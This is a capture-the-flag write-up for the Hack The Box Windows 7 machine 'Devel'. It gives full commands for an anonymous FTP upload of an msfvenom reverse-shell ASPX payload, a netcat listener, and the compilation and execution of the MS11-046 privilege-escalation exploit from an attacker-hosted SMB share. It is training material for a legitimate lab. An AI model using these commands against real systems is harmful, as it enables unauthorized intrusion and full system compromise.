Heath Adams challenged his students to become root on HTB Devel without using Meterpreter1. I accepted that challenge and succeeded! This is the report of how I did it.
In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).
Create a Connection to the HTB Network
Refer to this post of mine.
Scanning and Enumeration
Open https://www.hackthebox.eu/home/machines and write down Devel’s IPv4 address. Here we can also see that this is a Windows machine.
We first scan the target machine in order to identify open ports and services running behind those ports.
nmap -A -T4 -p- 10.10.10.5The scan shows that the machine has two open ports:
- FTP (21): We notice that anonymous FTP login is allowed. This tells us that we can upload files to the web server. Moreover, we can see some files here as well. It seems like it is a web root directory.
- HTTP (80): We learn that the http-server-header is
Microsoft IIS/7.5. If this were a pentest, this would be a finding as this is information disclosure. Moreover, we also get to know that the http-title isIIS7. This indicates that we are dealing with a default web-page.
The first thing we do for this enumeration is visiting the website 10.10.10.5.
As our scan suggested, we are dealing with a default web-page. A default web-page indicates poor hygiene. What else did the website developer mess up? We look for extra directories by doing directory busting with DirBuster.
/usr/share/wordlists/dirbuster and we look for asm, asmx, asp, aspx, txt, zip, bak, rar files.DirBuster does not return anything interesting. The next step is to understand if we can execute files uploaded via FTP on the target. In order to do this, we first create a text file called test.txt on our Kali machine in which we write “test FTP”. Then, we connect to the target via FTP and upload this file. Now we navigate to 10.10.10.5/test.txt in the web-browser. Wow! We can see “test FTP” being displayed. This means that the server read our file and executed it.
test.txt with content “test FTP” on your Kali machine. Now enter the following commands in the Kali terminal (> separates the commands): ftp 10.10.10.5 > (enter username) anonymous > (enter password) anonymous > put test.txt . Then navigate to 10.10.10.5/test.txt and press Enter.Exploit Devel with a Windows payload
In this section, our goal is to get a reverse shell through FTP. Firstly, we will create a Windows payload with Msfvenom2 and save it into an aspx file. Then we will upload this file to the Devel machine via FTP and, after having set up a listener with Netcat, execute it.
We save the Msfvenom payload list into venom-payloads.txt and grep this file for windows/shell3 payloads.
There are two payloads that are interesting for us: windows/shell/reverse_tcp and windows/shell_reverse_tcp. The first is a staged payload, whereas the second is a non-staged payload. The difference between the two is well-explained in this table:
The staged payload did not get me in. For this reason, I will show you how to get a reverse shell by using the non-staged payload.
We create the payload and save it into ex_shell_ns.aspx :
msfvenom -p windows/shell_reverse_tcp LHOST=<Your IPv4 address> LPORT=4444 -f aspx > ex_shell_ns.aspx
We then load this file to the Devel Machine via FTP:
ftp 10.10.10.5
anonymous(This is the username)
anonymous(This is the password)
binary(Set the transfer type: Binary instead of ASCII)
put ex_shell_ns.aspx
We also open a new terminal tab and set up a listener with Netcat, where -n stands for numeric-only IP addresses, -v for verbose, -l for listen mode for inbound connects, and -p for local port number (in this case, port 4444):
nc -nvlp 4444
Finally, we open 10.10.10.5/ex_shell_ns.aspx in our browser and we get a shell!
Unfortunately, we are not root on this machine yet.
Post-exploit enumeration and Windows privilege-escalation
In this section, our goal is to become root on the target machine. This action is called privilege-escalation, as we have a non-root shell already. Before running this attack, we need to do post-exploit enumeration in order to find a working exploit for this specific machine.
First, we get some information on the target machine.
This is a Windows 7 machine (version 6.1.7600) with x86 architecture. Let’s google “windows 7 (6.1 build 7600) exploit”. Among the results, this exploit is the most interesting: “An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges).” The only prerequisite is “low privilege access to the target OS”. No problem, we have this already. Let’s go ahead and use it.
We download the C source code to our Kali machine and save it as MS11-046.c and compile it as a 32-bit payload with mingw4:
i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
Now we have to make MS11-046.exe accessible on the target machine. To do this, we launch an smbserver with Python on Kali:
mkdir smb
cp /usr/share/windows-resources/binaries/nc.exe smb/
mv MS11-046.exe smb/
smbserver.py share smb
Now we go back to our shell on the target and run MS11-046.exe :
\\<Your IPv4 address>\share\MS11-046.exe on the target and we become root.We are now the root user on the machine Devel! Now you just have to find the two flags for users root and babis. I leave this task as a challenge for you.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!